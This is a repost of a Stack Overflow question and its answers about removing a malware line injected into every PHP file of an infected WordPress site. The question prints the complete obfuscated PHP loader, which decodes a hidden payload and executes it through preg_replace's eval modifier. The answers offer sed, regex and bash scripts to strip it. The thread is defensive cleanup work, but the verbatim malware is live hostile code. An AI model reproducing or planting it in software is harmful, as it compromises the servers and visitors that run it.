Removing a string in a PHP file with Start and End

佐手、 提交于 2019-12-18 07:00:00

问题


I'm trying to clean a WordPress which has been infected by an exploit.

All php files were added a line like this at the beginning of it :

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} @error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>

The content of this line is random for each files, but they all start with <?php if(!isset($GLOBALS[ and ends with -1; ?>.

I'm trying to create a PHP file removing this line to all my files.

Here's what I've done now :

<?php

$dir_iterator = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($dir_iterator);
$infected = 0;
$clean = 0;
foreach ($iterator as $file) {
if($file->getExtension() == 'php'){
    $f = fopen($file->getPathname(), 'r+');

    $start = '<?php if(!isset($GLOBALS[';
    $end = '-1; ?>';

    if(fgets($f, 26) == '<?php if(!isset($GLOBALS[')
    {
        echo '<p style="color: red;"> The file '. $file->getPathname() . ' is infected ! </p>';

        // Don't know what to do here

        $infected++;            
    }
    else
    {
        echo '<p style="color: green;"> The file '. $file->getPathname() . ' is clean ! </p>';
        $clean++;
    }


}

}

echo $infected.' files infected <br />';
echo $clean. ' files clean.';

?>

But I'm not very eased with file editing in PHP, so I would like to remove the line starting with my $start and ending with my $end .

I'm a bit lost with fseek, fwrite in the PHP doc, and don't really know which one I should use and how.

Waiting for your help :) !


回答1:


You might want to switch tools for this job. Use sed(1):

$ sed -e '1 s/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php

You can write a thin exec() wrapper in PHP, if you have no shell access.




回答2:


I am angry of ruined servers and I have written script as a class to solve this, when you don't have root access to server.

// Import and setup Guardian script
include '../NarniaGuardian/NarniaGuardian.php';
$Guard = new NarniaGD;
$Guard->cleanFiles('../wordpress/');

You would import code, point it to root of malware and update malware sample library until everything is clean.

Please, for more check here https://github.com/Pilskalns/Narnia-Guardian

OOP approach could be easy edited further to monitor if anything comes along again.




回答3:


I write script to delete this malware.

function deleteMalware()
{
    $directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(ABSPATH, RecursiveDirectoryIterator::SKIP_DOTS));
    foreach($directory_iterator as $filename => $file)
    {
        if ($file->getExtension() !== "php") {
            continue;
        }
        $content = file_get_contents($filename);
        $reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
        $count = 0;
        $newContent = preg_replace ($reg, '', $content, -1, $count);

        if($count === 1) {
            file_put_contents ($filename, $newContent);
        }
    }

};

I hope it helps :)




回答4:


One of my customers had exactly the same issue and we had to run trough it, we found that there might be several types of PHP files and not all of them starts the same, all the above solutions would work only if all PHP files on your server starts with ?php, anything else would damage your files.

The solution we used (provided below) catches all infected PHP files on your server, backup them (with it original path),restoring them into it orig state, and also write a summary file with the result It works great for my customer (about 21000~ PHP files scanned and fixed in 7min) In order to use it copy the below code into file on your home directory name the file php_fix.sh

Make it executable by typing chmod +x php_fix.sh and run it: ./php_fix.sh y

You may also download it from my site: http://okgamestudio.com/sites/igal/php_fix.sh

#!/bin/bash

infected_files=0
fixed_files=0
DATE=`date +"%d-%m-%y %T"`
find . -name "*.php" |grep -v 2fix > php_files.dat

php_files=`cat php_files.dat |wc -l`

if [ ! `ls 2fix` ]
then
    mkdir 2fix
fi

while read file_name
do
    if [[ `head -1 $file_name |grep GLOBALS` ]]
    then
            if [[ $1 == "y" ]]
        then
        fixed_string=`head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'`
        cp --parents $file_name 2fix/
            sed -i "1s/.*/$fixed_string/" $file_name
        #sed -i "1s/.*/\<\?php/" $file_name
        #sed -i '1d' $file_namea
        let fixed_files=$fixed_files+1
        else
        let infected_files=$infected_files+1
    fi  
    fi
done < php_files.dat
echo $DATE, "Scannded files:" $php_files, "Fixed files:" $fixed_files, "Infected: " $infected_files >> fixed_files.dat
exit


# head -1 $file_name |grep GLOBALS | awk -F"?>" '{print $3}'



回答5:


I forked Narnia-Guardian for easy use and bugfix.

  1. Download WordpressGuardian source code https://github.com/liruqi/WordpressGuardian
  2. Backup your affected wordpress copy
  3. bash NarniaGuardian.sh [path to wordpress root]
  4. Find suspicious/malicious long-line unreable code, update pattern in blacklist.txt
  5. Go back to step 2

This can clean up injected code.

Another possible approch is to find long lines in PHP file. And remove them or replace them with <?php if needed.




回答6:


Using sed -i.bak 's/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php is working for me. Essentially just replacing -e with -i.bak




回答7:


I had once to deal with this problem and I finally had to create an script to remove all lines from the /var/www directory.

You can see here https://stackoverflow.com/a/26285498/3000681

regards.



来源:https://stackoverflow.com/questions/25996752/removing-a-string-in-a-php-file-with-start-and-end

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!